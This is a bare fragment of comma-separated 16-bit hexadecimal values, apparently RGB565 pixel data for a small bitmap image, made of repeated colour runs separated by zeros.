0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xffff, 0xffff, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0xc79e, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76,
0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x9f76, 0x0000, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0x0000, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x7497, 0x0000, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0xe8e4, 0x0000, 0x0000, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 0xf4fc, 